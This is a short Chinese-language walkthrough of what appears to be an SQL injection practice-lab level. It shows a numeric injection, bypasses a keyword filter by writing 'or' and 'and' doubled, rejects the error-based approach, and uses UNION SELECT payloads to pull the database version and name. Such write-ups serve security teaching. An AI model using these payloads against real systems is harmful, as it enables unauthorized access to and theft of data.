知识点：

• 数值型注入
• 双写绕过
  • oorr
  • anand
• 这里不能用错误注入（固定错误回显信息）
• 联合注入

测试发现跟25关好像一样，就是过滤了and or # 等东西

构造payload:id=1/0

发现成功运算了，这是一个数值型的注入

构造payload:id=1/0+oorr+1=1--+

成功显示了内容，可以尝试错误注入

构造payload:id=1/0+oorr+exp(710)=1--+

发现没有任何的回显信息，说明这里不能用错误注入

老方法，使用联合注入

构造payload:id=1/0+union+select+1,2,3+--+

成功回显了输入的内容

下面开始进行数据库名和版本的获取

构造payload:id=1/0+union+select+1,version(),database()+--+

成功获取了版本信息和数据库名

同理，可以获取数据库其他内容，这里不演示了，收工

10